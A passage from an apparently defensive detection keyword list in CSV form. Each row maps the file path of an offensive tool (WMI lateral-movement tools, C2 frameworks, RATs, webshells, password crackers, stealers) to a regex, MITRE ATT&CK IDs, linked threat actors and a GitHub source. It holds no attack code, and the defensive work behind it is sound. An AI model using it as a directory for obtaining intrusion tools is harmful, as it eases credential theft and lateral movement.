- T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12658" "*/wiresocks.git*",".{0,1000}\/wiresocks\.git.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - 
TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","12669" "*/wlanpass.txt*",".{0,1000}\/wlanpass\.txt.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#linux","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","12689" "*/WMEye.git*",".{0,1000}\/WMEye\.git.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","12690" "*/wmeye/*",".{0,1000}\/wmeye\/.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","12691" "*/WMI Lateral Movement/*",".{0,1000}\/WMI\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","12692" "*/wmi.dropper*",".{0,1000}\/wmi\.dropper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","12693" "*/WMI/wmi.py*",".{0,1000}\/WMI\/wmi\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","12694" "*/wmi_exec.exe*",".{0,1000}\/wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","12695" "*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","12696" "*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","12697" "*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12698" "*/wmiexec/*",".{0,1000}\/wmiexec\/.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","12699" "*/wmiexec2.git*",".{0,1000}\/wmiexec2\.git.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","12700" "*/wmiexec-Pro*",".{0,1000}\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","12701" "*/wmiexec-Pro.git*",".{0,1000}\/wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","12702" "*/WMIHACKER.git*",".{0,1000}\/WMIHACKER\.git.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/rootclay/WMIHACKER","1","1","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","12703" "*/WMIHACKER.vbs*",".{0,1000}\/WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12704" "*/WMIHACKER.vbs*",".{0,1000}\/WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","1","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","12705" "*/wmipersist.exe*",".{0,1000}\/wmipersist\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12706" "*/wmipersist.py*",".{0,1000}\/wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12707" "*/WMIPersistence.git*",".{0,1000}\/WMIPersistence\.git.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","12708" "*/wmiquery.py*",".{0,1000}\/wmiquery\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12709" "*/WMIReg.exe*",".{0,1000}\/WMIReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12710" "*/WMIReg.exe*",".{0,1000}\/WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12711" "*/wmisploit*",".{0,1000}\/wmisploit.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","12712" "*/word_list.c",".{0,1000}\/word_list\.c","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12713" "*/word_list.h",".{0,1000}\/word_list\.h","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12714" "*/wordlists/combined_male_names.txt*",".{0,1000}\/wordlists\/combined_male_names\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12715" "*/wordlists/familynames-usa-top1000.txt*",".{0,1000}\/wordlists\/familynames\-usa\-top1000\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12716" "*/wordlists/femalenames-usa-top1000.txt*",".{0,1000}\/wordlists\/femalenames\-usa\-top1000\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12717" "*/wordlists/malenames-usa-top1000.txt*",".{0,1000}\/wordlists\/malenames\-usa\-top1000\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12718" "*/wordlists/names_quit_riot.txt*",".{0,1000}\/wordlists\/names_quit_riot\.txt.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#linux","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","12719" "*/wordlists/owa_directories.txt*",".{0,1000}\/wordlists\/owa_directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and 
attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","12720" "*/wordlists/skype-directories.txt*",".{0,1000}\/wordlists\/skype\-directories\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","12721" "*/wordlists/top_10000.txt*",".{0,1000}\/wordlists\/top_10000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","12722" "*/wordlists/top_100000.txt*",".{0,1000}\/wordlists\/top_100000\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","12723" "*/workflow/test/dirbscan.yaml*",".{0,1000}\/workflow\/test\/dirbscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","12725" "*/Worm.dll*",".{0,1000}\/Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to 
ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12726" "*/worm/inject.ps1*",".{0,1000}\/worm\/inject\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","12727" "*/Worse Linux Shell.php*",".{0,1000}\/Worse\sLinux\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12728" "*/wpaf/finder.py*",".{0,1000}\/wpaf\/finder\.py.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/kancotdiq/wpaf","1","0","#linux","N/A","N/A","1","80","15","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z","12729" "*/wpscan.py*",".{0,1000}\/wpscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","12730" "*/wraith.git*",".{0,1000}\/wraith\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, 
modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12731" "*/wraith.py*",".{0,1000}\/wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12732" "*/wraith-master.zip*",".{0,1000}\/wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12733" "*/wraith-RAT-payloads*",".{0,1000}\/wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12734" "*/wraith-RAT-payloads.git*",".{0,1000}\/wraith\-RAT\-payloads\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and 
control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12735" "*/wraith-server.py*",".{0,1000}\/wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12736" "*/wraith-server_v*.py*",".{0,1000}\/wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","12737" "*/WSAAcceptBackdoor.git*",".{0,1000}\/WSAAcceptBackdoor\.git.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","12738" "*/wsdd-discover.nse*",".{0,1000}\/wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
